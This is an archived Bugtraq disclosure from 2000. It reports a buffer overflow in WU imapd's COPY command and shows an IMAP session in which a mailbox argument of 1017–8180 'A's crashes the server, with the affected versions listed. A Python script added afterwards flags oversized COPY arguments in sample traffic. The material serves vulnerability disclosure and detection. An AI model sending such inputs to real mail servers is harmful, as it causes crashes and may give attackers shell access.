Bugtraq mailing list archives
another WU imapd buffer overflow
From: siva9 () CLICO PL (Michal Szymanski)
Date: Fri, 21 Apr 2000 02:12:18 +0200
Hi,

While doing a code security audit, I discovered another buffer overflow in imapd. This time the security flaw exists in the standard rfc 1064 COPY command:

    * OK mail IMAP4rev1 v12.264 server ready
    * login siva9 secret
    * OK LOGIN completed
    * select inbox
    * 2 EXISTS
    * 0 RECENT
    * OK [UIDVALIDITY 956162550] UID validity status
    * OK [UIDNEXT 5] Predicted next UID
    * FLAGS (\Answered \Flagged \Deleted \Draft \Seen)
    * OK [PERMANENTFLAGS (\* \Answered \Flagged \Deleted \Draft \Seen)] Permanent
    * flags
    * OK [UNSEEN 2] first unseen message in /var/spool/mail/siva9
    * OK [READ-WRITE] SELECT completed
    * copy 1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... [a lot of A's]

No answer. Process has been killed by SIGSEGV.

Number of A's must be in range from 1017 to 8180. After LOGIN all privileges are dropped, but we still have the possibility to get unprivileged shell access.

I've tested it against WU imapd v10.223, v11.241, v12.250, v12.261, and v12.264.

Regards,
Michal Szymanski [michal_szymanski () linux com pl]
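
A defensive check for the condition reported above, added here as an example; it is not part of the original post or of the WU imapd code. It flags COPY (and UID COPY) client commands whose mailbox argument is at least 1017 bytes, the lower bound given in the post; the function names, the sample commands and the handling of quoted strings and literals are assumptions of this example.

```python
import re

# Lower bound of the crashing argument length reported in the post.
MIN_SUSPECT_LEN = 1017

# tag, optional "UID", COPY, message set, then the mailbox argument.
COPY_RE = re.compile(
    rb'^(?P<tag>\S+) +(?:UID +)?COPY +(?P<set>\S+) +(?P<mbox>.*?)\r?\n?$',
    re.IGNORECASE | re.DOTALL)
LITERAL_RE = re.compile(rb'^\{(\d+)\+?\}$')

def mailbox_arg_length(line):
    """Return the mailbox argument length of a COPY command, or None."""
    m = COPY_RE.match(line)
    if m is None:
        return None  # not a COPY command
    mbox = m.group('mbox')
    lit = LITERAL_RE.match(mbox)
    if lit:  # literal: the client announces the byte count up front
        return int(lit.group(1))
    if len(mbox) >= 2 and mbox.startswith(b'"') and mbox.endswith(b'"'):
        return len(mbox) - 2  # quoted string: ignore the surrounding quotes
    return len(mbox)

def scan(lines, limit=MIN_SUSPECT_LEN):
    """Return (line_number, length) for each COPY with an oversized mailbox."""
    hits = []
    for number, line in enumerate(lines, start=1):
        length = mailbox_arg_length(line)
        if length is not None and length >= limit:
            hits.append((number, length))
    return hits

# Constructed sample client commands (not captured traffic).
SAMPLE = [
    b'a1 login siva9 secret\r\n',
    b'a2 select inbox\r\n',
    b'a3 copy 1 Archive\r\n',
    b'a4 copy 1 ' + b'A' * 1017 + b'\r\n',
    b'a5 UID COPY 2:4 {4096}\r\n',
    b'a6 copy 1 "' + b'B' * 1016 + b'"\r\n',
]

if __name__ == '__main__':
    for number, length in scan(SAMPLE):
        print(f'line {number}: COPY mailbox argument of {length} bytes')
```
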